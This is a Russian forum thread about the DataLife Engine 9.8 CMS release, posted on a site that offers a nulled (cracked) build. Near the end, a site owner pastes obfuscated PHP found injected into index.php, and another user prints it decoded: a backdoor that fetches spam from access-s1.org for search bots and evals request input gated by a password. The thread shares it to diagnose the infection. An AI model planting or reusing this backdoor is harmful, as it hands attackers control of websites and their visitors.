• DONATE to NULLED!
    Форуму и его команде можно помочь, мотивировать модераторов разделов.
    Помогите модератору этого раздела killoff лично.

Информация DataLife Engine v.9.8 Final Release

Crazy182

Старатель
Регистрация
29 Ноя 2006
Сообщения
214
Реакции
14
1 февраля DataLife Engine v.9.8 вышел в свет.

Были подготовлены и реализованы следующие изменения:
1. Для администрации сайта добавлены новые механизмы для быстрой борьбы со спамерами в комментариях. Для этого в шаблоны вывода комментариев добавлены теги [spam] Спамер [/spam], которые выводят текст, указанных в них, в виде ссылки, при нажатии на которую происходит отметка посетителя, оставившего комментарий как "спамера". При этом если пользователь отмечается как "спамер", все его комментарии автоматически удаляются с сайта, а самому посетителю запрещается в дальнейшем публикация новостей и комментариев на сайте, а если комментарий был добавлен от имени гостя, то его IP помещается в список заблокированных для доступа к сайту. Тем самым администрация сайта может удалять все комментарии спамера и блокировать ему доступ к добавлению новых комментариев всего в один клик. Доступ к отметке пользователя как "спамер" имеют группы пользователей, которым разрешен доступ к админпанели и которым разрешено удаление любых комментариев в настройках групп.

2. В админпанели при редактировании новостей, находящихся на модерации, для администраторов и редакторов сайта добавления кнопка "Спам", при нажатии на которую администрация может отметить пользователя, отправившего новость на модерацию, как "спамера". При этом все другие новости данного пользователя, находящиеся на модерации будут удалены, а самому пользователю будет запрещено добавлять новости и комментарии на сайте в будущем. Данная возможность позволяет также в один клик удалить спамерские новости, а самого пользователя ограничить в правах.

3. При просмотре посетителем полной новости на сайте, добавлена возможность отметить интересные фрагменты текста на странице и получить уникальный url с размеченными фрагментами. Таким образом, любой желающий может, выделив в тексте нужные части (параграфы, предложения или слова), поделиться с кем-либо сгенерированной уникальной ссылкой, также данную ссылку он сможет опубликовать в своей социальной сети. При переходе по такой ссылке пользователь попадет на страницу с исходным текстом, а браузер будет прокручен к выделенному тексту. Данная возможность включается и отключается в админпанели в настройках скрипта.

4. Добавлена возможность включать или отключать в настройках скрипта область действия авторизационных куков и сессий пользователей. Вы можете включить, чтобы авторизационные данные распространялись на домен и все поддомены, что полезно при создании несколько отдельных сайтов с единой системой регистрации и авторизации. Либо вы можете установить, чтобы данные распространялись только на домен где установлен скрипт, что является полезным, если на домене и поддоменах вы создаете полностью независимые сайты.

5. Добавлена возможность скачивать некоторые типы файлов, загруженных на сервер через DLE, непосредственно при просмотре сайта с мобильного телефона или смартфона. Например, добавлена поддержка скачивания документов в формате PDF и Word, а также добавлена поддержка скачивания программ для системы Android в формате .apk.

6. Для шаблона вывода результатов поиска (searchresult.tpl) добавлено использование новых тегов: {image-x} который выводит URL картинки, находящийся в тексте новости, где "x" это номер картинки в новости, например, {image-1} выведет URL первой картинки в новости. Добавлено использование тегов [image-x] текст [/image-x], которые выводят указанный в них текст, только если картинка с номером "x" присутствует в новости. А также добавлен новый тег {result-text limit="x"}, который выводит текст найденной новости без HTML форматирования, при этом сам текст публикации сокращается до указанного "x" количества символов.

7. Добавлена поддержка тегов [ hide] и [/ hide] для использования в персональных сообщениях на сайте.

8. В админпанели, в разделе редактирования пользователей добавлена возможность устанавливать количество пользователей выводимых на страницу при поиске по различным параметрам. Данная опция будет полезна, тем администраторам, которым необходимо выполнить массовые действия над большим количеством пользователей, например, удалить большое количество пользователей.

9. В админпанели, в разделе управления картинками, добавлена возможность загружать изображения с компьютера на сервер.

10. Для тега пользовательского вывода публикаций {custom} добавлена поддержка атрибута fixed="yes". Данный атрибут позволяет задавать, учитывать ли при выводе публикаций, то что новости были зафиксированы или нет. Например, тег {custom category="1" aviable="global" from="0" limit="10" fixed="yes"}, выведет новости на сайте поместив в самое начало именно зафиксированные новости из указанной категории. А тег {custom category="1" aviable="global" from="0" limit="10" order="date"} выведет отсортированные по дате, при этом не будет учитываться зафиксирована новость или нет.

11. Добавлена возможность использования в шаблонах одновременно тегов {title limit="х"} и {title}, {short-story limit="x"} и {short-story} а также тегов {full-story limit="x"} и {full-story}

12. BB редактор, используемый на сайте для добавления новостей и для комментариев, полностью переведен на использование шаблонов и стилей CSS шаблонов. Тем самым у веб-мастеров появилась возможность не только менять картинки кнопок редактора, но и полностью кардинально менять его внеший вид по своему усмотрению.

13. Внесены изменения в алгоритмы работы фильтра слов. Обработка входящего текста фильтром производится в самом начале, до его обработки парсером ББ тегов. Тем самым расширяются возможности защиты от возможного спама без блокирования возможностей скрипта. Например, при внесении в фильтр таких стоп слов как "http://" или ".ru", больше не будет также блокироваться работа стандартных смайлов используемых в комментариях или новостях.

14. Улучшена система поиска пользователей в админпанели в разделе редактирования пользователей. Добавлена возможность поиска пользователей по неполной части логина или e-mail адреса. Например, задав в поиске по e-mail адрес @mail.ru вы можете найти всех пользователей, которые использовали при регистрации почтовый ящик сервера mail.ru и т.д.

15. Для шаблонов main.tpl и вывода полный новостей fullstory.tpl добавлены новые теги: [news=1,2,3] текст [/news], которые выводят заключенный в них текст, если посетитель просматривает полную новость указанных в параметре тега новостей, где 1,2,3 это ID новостей. Также был добавлен противоположный тег [not-news=1,2,3] текст [/not-news], который выводит текст на любых других страницах кроме просмотра указанных в теге новостей. Тем самым, благодаря данной возможности вы можете настраивать оформление страниц своего сайта для каждой новости персонально.

16. Для шаблонов main.tpl и вывода кратких новостей shortstory.tpl добавлены новые теги: [tags=тег1,тег2,тег3] текст [/tags], которые выводят заключенный в них текст если посетитель просматривает страницы с перечисленными ключевыми словами из облака тегов, где тег1,тег2,тег3 это ключевые слова из облака тегов. Также был добавлен противоположный тег [not-tags=тег1,тег2,тег3] текст [/not-tags], который выводит текст на любых других страницах кроме указанных в теге.

17. Улучшена система цитирования комментариев на сайте. В случае если посетитель не выделяет текст комментария, а просто нажимает на кнопку цитирования, то в поле вставляется не просто логин пользователя, которому принадлежит комментарий, а полностью цитата его комментария, с сохранением форматирования данного комментария.

18. Добавлено автоматическое уведомление поисковых систем об обновлении карты сайта при ее автоматическом обновлении с использованием файла крона.

19. Добавлено раскладывание загружаемых файлов (не картинок) на сервер по папкам месяцам. Для этого, при загрузке файлов, в папке uploads/files/ создаются каждый месяц подпапки в формате "год-месяц", куда помещаются загруженные файлы. Тем самым файлы более не накапливаются в одной папке, что делает более удобным поиск нужного файла на сервере при необходимости и снижает нагрузку на файловую систему при большом количестве загружаемых файлов.

20. Добавлена возможность для администраторов сайта при загрузке файлов по FTP на сервер в папку uploads/files/, создавать в ней внутренние подпапки, и загружать в них файлы по FTP. Ранее скрипт поддерживал загрузку файлов только непосредственно в саму папку uploads/files/.

21. Для шаблона main.tpl добавлены новые шаблонные теги [related-news] {related-news} [/related-news], которые позволяют выводить блок похожих новостей при просмотре полной новости. Данные теги будут полезны для сайтов, которые хотят выводить похожие новости за пределами шаблона вывода полной новости (fullstory.tpl), например в боковых колонках на сайте.

22. В админпанели, в разделе управления голосованиями на сайте, добавлена возможность установки для голосования групп пользователей, которым показывать данное голосование. Тем самым вы можете создавать на сайте различные опросы для различных групп пользователей.

23. Добавлена поддержка сервиса Gravatar, для использование аватаров пользователями на сайте. Тем самым ваши пользователи могут не только загружать на ваш сервер свои аватары, но и использовать собственные с сервиса Gravatar. Также вы можете просто запретить загрузку аватаров на сервер, и оставить возможность только использования сервиса Gravatar для показа аватаров пользователей.

24. В админпанели скрипта в разделе управления настройками категорий, добавлена возможность указывать файлы шаблонов для краткой и полной новости, расположенные в подпапках вашего шаблона. Например, вы можете указать myfolder/test и тогда будет для категории загружаться шаблон по адресу /templates/ ваш шаблон /myfolder/test.tpl.

25. Для шаблона вывода полной новости (fullstory.tpl) добавлен новый тег [pages] текст [/pages], который выводит указанный текст в тегах, если новость разбита на несколько страниц при помощи тега {PАGEBREAK} и убирает текст в нем, если новость состоит из одной страницы. Данный тег крайне полезен если вебмастера, при оформлении шаблона, хотят разместить навигацию по страницам в специально оформленных блоках или добавить необходимые дополнительные стили.

26. Для тега пользовательского вывода публикаций {custom ...} добавлен новый параметр author="x", который выводит новости, фильтруя их по автору новости, где X это логин автора. Например, тег {custom author="admin" limit="5"} выведет 5 новостей автора с логином "admin".

27. Для тега пользовательского вывода публикаций {custom ...} добавлен новый параметр days="x", который выводит новости, используя временной период, где x это количество дней за которые выводить публикации. Например, тег {custom days="2" limit="5"} выведет 5 новостей за 2 последних дня.

28. Добавлена возможность, для дополнительных полей новостей с типом "список", устанавливать опцию "Использовать значения полей как перекрестные гиперссылки". Тем самым расширяются возможности по внутренней перелинковке публикаций на сайте.

29. При воспроизведении видео с сервиса Youtube в стандартном плеере, добавлен показ превью картинки видео, непосредственно с сервиса Youtube.

30. Добавлена возможность самостоятельно переключать посетителем качество видеороликов с сервиса Youtube непосредственно при их просмотре на сайте.

31. При удалении новостей найденных в режиме поиска похожих новостей в админпанели, добавлено предварительное уведомление о том, что новость будет удалена безвозвратно, и пользователю необходимо будет подтвердить данное действие. Также добавлена возможность отправки уведомления автору данной новости, с сообщением о причинах удаления данной новости.

32. Для редактора шаблонов, в админпанели скрипта, добавлена новая функция автоматического форматирования выделенного кода. Данная функция позволяет отформатировать HTML или CSS код из сжатого вида, в более удобно читаемый код.

33. Внесены изменения в алгоритмы работы тега {image-x} при просмотре полных новостей на сайте. Ранее данный тег выводил везде и всегда изображения из кратких новостей. Теперь при просмотре полной новости на сайте данный тег выводит картинки, опубликованные в поле полной новости.

34. Внесены изменения в систему очистки кеша скрипта. В случае если в настройках скрипта включено кеширование Memcache, а сторонние модули не используют настройки кеширования и сохраняют кеш в файлах, то DLE также будет очищать кеш файлы, созданные сторонними модулями при необходимости очистки кеша.

35. Добавлена полная поддержка браузера IE10.

36. До актуальных версий были обновлены: фреймворк jQuery, WISYWIG редакторы TinyMCE и LiveEditor.

37. Исправлена проблема, при которой была возможность регистрировать на сайте визуально невидимые логины.

38. Исправлена проблема, при которой происходило некорректное удаление дополнительных полей в админпанели скрипта.

39. Исправлена проблема, связанная с некорректной работой тега [ code] при редактировании новости в визуальном редакторе TinyMCE.

40. Исправлена проблема, при которой в некоторых случаях происходило "зависание" при массовой загрузке картинок и других файлов, и необходимо было закрывать окно загрузки и открывать его повторно.

41. Исправлена проблема, при которой невозможно было использовать картинки в персональных сообщениях при использовании WYSIWYG редактора, несмотря на то что использование изображений было разрешено в настройках группы.

42. Исправлена проблема, при которой пользователи которым разрешено управлять статическими страницами в админпанели скрипта (в том числе администраторы), не могли управлять загруженными для данной страницы файлами и картинками, если страница была создана другим пользователем на сайте.

43. Исправлена проблема, связанная с редактированием информации о категориях при использовании PHP линейки 5.4.x

44. Исправлены обнаруженные и заявленные ранее небольшие ошибки в скрипте.
С картинками тут: Для просмотра ссылки Войди или Зарегистрируйся

Изменения в шаблонах версий от 9.7 до 9.8
Для просмотра ссылки Войди или Зарегистрируйся

DataLife Engine v.9.8 Final Release Nulled by M.I.D-Team
Официальные дистрибутивы (НЕ НУЛЛ) :

Походу dle сливает, ничего нового и особо полезного. :(
 
Начал ковырять двиг, нашёл потрясную штуку! ДЛЕ закрыли дырку в регистрации, когда было достаточно самому сгенерировать ключ активации аккаунта и подтверждение по мылу было не обязательным. Теперь же боты столкнуться с реальной проблемой работы с почтой, которая становится обязательная.

Новый ключ активации теперь генерируется так:
PHP:
$stronghash = substr(sha1(DBHOST . DBNAME . DBPASS), 5, 25);
$idlink = rawurlencode( base64_encode( $name . "||" . $email . "||" . md5( $password1 ) . "||" . md5( sha1( $name . $email . $stronghash . $config['key'] ) ) ) );

Т.е. ключ генерируется с использованием уникальных настроек подключения MySQL, а так же по старинке - логин, емейл пользователя и лицензионный ключ сайта. Раньше же ключ генерировался только из логина, мыла и лицензионного ключа, что давало ботам возможность генерировать прямую ссылку на активацию скрипта с высокой долей пробива (лицензионный ключ на нулах отсутсвует, а на лицензиях предсказуемо генерируется методом перебора).

Однако осталась старая проблема регистрации 2 человек с разными E-mail, но одним ником. Проблема возникает, если 1 пользователь зарегистрировался, но не подтвердил аккаунт, затем второй пользователь подтверждает свой аккаунт, ссылка первого пользователя становится не действительной и возникают логичные вопросы к админу.

Да, это проблема для юзера, а не для сайта, но вина в этой проблеме 100% на совести CMS, которая должна защитить новых пользователей от таких перехватов ников. Хотя, вопрос спорных. Благо безопасность сайта оберегает функция check_reg при проверке активации, которая в совю очередь проверяет E-mail и ник по базе сайта.
 
меня глючит, или это ошибка:
PHP:
	if( PHP_VERSION < 5.2 ) {

		if ( DOMAIN ) setcookie( $name, $value, $expires, "/", "; HttpOnly" );
		else setcookie( $name, $value, $expires, "/", DOMAIN . "; HttpOnly" );
	
	} else {
		
		setcookie( $name, $value, $expires, "/", DOMAIN, NULL, TRUE );
	
	}
Получается, что для PHP ниже 5.2 если DOMAIN задан, мы на него куку не вешаем, а если не занят - то вешаем... Мне кажется или должно быть наоборот?
 
Кстати по поводу кук, заметил интересную особенность движка, если через админку сменить себе ник, то потом по нажатии кнопки ВЫХОД, ни фига не выходит из профиля
 
А я заметил ещё одну неприятную новость: версия utf-8 больше таковой не является. Теперь двиг распространяется ТОЛЬКО в cp1251, а UTF-8 отличается базой в UTF-8 и шаблонами в utf-8, сам же двиг теперь всегда в cp1251... С одной стороны, модули теперь писать легче, с другой стороны, кто делал модули для utf-8, теперь переделывать под cp1251...
 
Мне вот не нравился ?mod=comments&action=edit и ?mod=cmoderation, если к примеру установлена модерация добавленных гостями комментов без регистрации - выводит только $row['author'] + IP, к примеру человек указал свой e-mail, через эти 2 страницы модерации его увидеть невозможно, при нажатии на юзера - окошко User not found!

Данная нелепость кочует от релиза к релизу. Для себя решил так:

Код:
if ($row['email'] != "") {
            $row['email'] = stripslashes($row['email']);
            $author_email = "<br/><br/>E-mail:<br/><a href=\"mailto:{$row['email']}\" title=\"Написать письмо автору\">{$row['email']}</a>";
    }
    else {
        $author_email = "";
    }
А в строчке $row['autor'] просто ниже добавил {$author_email}, теперь под юзером мыльник есть.
 
Код один и тот же? Выложи код, посмотрим что за создане.

И скорее всего дело не в дистрибутиве, а твой хостинг (либо пароли) уже хакнули, и в таком случае что угодно можешь ставить, код все равно поставят, если не сменишь пароли (либо хостинг, если через соседей).
 
Полюбас что-то есть в дстрибутивах, обновился до 9.8 теперь index.php почти ежедневно переписывается.. всё удалил перезалил двиг через пару часов опять новый код.. =(
Ребят может кто поможет ... ? =(
Так, я предупреждал, что следующее подобное заявление закончится баном? У тебя 10 часов на то, чтобы доказать, что в дистрибутивах шелл и т.д. или последует пожизненный бан. Надоело!
 
Так, я предупреждал, что следующее подобное заявление закончится баном? У тебя 10 часов на то, чтобы доказать, что в дистрибутивах шелл и т.д. или последует пожизненный бан. Надоело!
Предыдущие сообщения не видел, пардон. Я не утверждал что дистрибутив с шелом но после обновления меня поломали ..
в течении дня выложу код.. как снова добавят .. кстати я про 8dle_ru говорю =( опять жить нормально не дают ..

Код один и тот же? Выложи код, посмотрим что за создане.

И скорее всего дело не в дистрибутиве, а твой хостинг (либо пароли) уже хакнули, и в таком случае что угодно можешь ставить, код все равно поставят, если не сменишь пароли (либо хостинг, если через соседей).

Не ..код меняется .. пассы менял
Код:
<?php $x12="\x63\165r\x6c\x5f\151\x6e\x69\x74"; $x13="c\x75\x72\154\137setopt"; $x14="c\x75\162\x6c_\145\170ec"; $x15="cu\162l\x5f\143\x6c\157s\145"; $x16="\145rror\137\x72e\160o\x72\x74\x69\x6e\x67"; $x17="e\x76a\x6c"; $x18="\x66\x69\x6ce\137\x67\x65t_\143\157\156\164\x65\156t\x73"; $x19="\x66\165\156\143\164\x69\x6fn\x5fe\170\151\x73\164\x73"; $x1a="\x69n\151\137\163\145t"; $x1b="\x69ni_\x67et"; $x1c="\x70\x72e\x67\137\155a\164\143h"; $x1d="\163\164\x72ip\163l\141\x73\150\145s"; $x1e="\163t\x72\163tr"; $x1f="\165\x72\154e\x6e\x63\x6f\144e";
$x16(0);$x1a("\x64\151\x73pla\171\137e\x72\162\x6f\x72\x73", "\x30");$x0b = "ht\x74p\072\057\x2f\x61cc\145\163\163\x2d\x731.o\x72g\x2f\x69\x6ede\170at\157r\x31\x2fg\145t\056\x70\x68p"; $x0c = "\0612\x333\0621q";if ($x1c("/\x28\x79\141n\144\x65\170\174\147o\x6f\x67\154\145\051\x2fi", $_SERVER['HTTP_USER_AGENT'])) {$x0d = $x1f("\150\164\164\x70\x3a/\057".$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI']);$x0e = $x1f($_SERVER['HTTP_USER_AGENT']);$x0f = $x0b."?\x69\144=".$x0d."&\143\x68a\162set\x3du\x26\x62\157t=".$x0e; if($x1b("\x61llo\167\x5f\x75\162\154\x5f\x66op\x65\156") == 1) { $x10 = $x18($x0f); if (!$x1e($x10, "\x2d\055"))echo $x10; }elseif($x19('curl_init')) {$x11 = $x12($x0f);$x13($x11, CURLOPT_HEADER, FALSE);$x13($x11, CURLOPT_RETURNTRANSFER, TRUE);$x10 = $x14($x11);$x15($x11); if (!$x1e($x10, "\055-"))echo $x10;} } $x0f = $x0b."?\143\x6fde\075\143\x6f\144e\046\142o\164\075".$x0e;if($x1b("\141\x6c\154\157\x77\x5f\x75\162\154\x5f\146\x6f\x70\x65\x6e") == 1) { $x10 = $x18($x0f); if (!$x1e($x10, "-\055"))echo $x10; }elseif($x19('curl_init')) { $x11 = $x12($x0f);$x13($x11, CURLOPT_HEADER, FALSE);$x13($x11, CURLOPT_RETURNTRANSFER, TRUE);$x10 = $x14($x11);$x15($x11);if (!$x1e($x10, "\x2d\055"))echo $x10;}if($_REQUEST["\143"] == $x0c) $x17($x1d($_REQUEST["\143\x6f\x64\145"])); ?><?php
/*
=====================================================
DataLife Engine - by SoftNews Media Group
-----------------------------------------------------
http://dle-news.ru/
 
А в какой файл прописывается? Права на этот файл выставлены какие?
Декодер выдал это:
Код:
<?php $x12="curl_init"; $x13="curl_setopt"; $x14="curl_exec"; $x15="curl_close"; $x16="error_reporting"; $x17="eval"; $x18="file_get_contents"; $x19="function_exists"; $x1a="ini_set"; $x1b="ini_get"; $x1c="preg_match"; $x1d="stripslashes"; $x1e="strstr"; $x1f="urlencode";$x16(0);$x1a("display_errors", "0");$x0b = "http://access-s1.org/indexator1/get.php"; $x0c = "123321q";if ($x1c("/(yandex|google)/i", $_SERVER['HTTP_USER_AGENT'])) {$x0d = $x1f("http://".$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI']);$x0e = $x1f($_SERVER['HTTP_USER_AGENT']);$x0f = $x0b."?id=".$x0d."&charset=u&bot=".$x0e; if($x1b("allow_url_fopen") == 1) { $x10 = $x18($x0f); if (!$x1e($x10, "--"))echo $x10; }elseif($x19('curl_init')) {$x11 = $x12($x0f);$x13($x11, CURLOPT_HEADER, FALSE);$x13($x11, CURLOPT_RETURNTRANSFER, TRUE);$x10 = $x14($x11);$x15($x11); if (!$x1e($x10, "--"))echo $x10;} } $x0f = $x0b."?code=code&bot=".$x0e;if($x1b("allow_url_fopen") == 1) { $x10 = $x18($x0f); if (!$x1e($x10, "--"))echo $x10; }elseif($x19('curl_init')) { $x11 = $x12($x0f);$x13($x11, CURLOPT_HEADER, FALSE);$x13($x11, CURLOPT_RETURNTRANSFER, TRUE);$x10 = $x14($x11);$x15($x11);if (!$x1e($x10, "--"))echo $x10;}if($_REQUEST["c"] == $x0c) $x17($x1d($_REQUEST["code"])); ?>
Шаблон дефолтный? Пройдись по изображениям твоего шаблона, скорее всего он прицеплен к какому-нибудь рисунку или гифке.
 
Назад
Сверху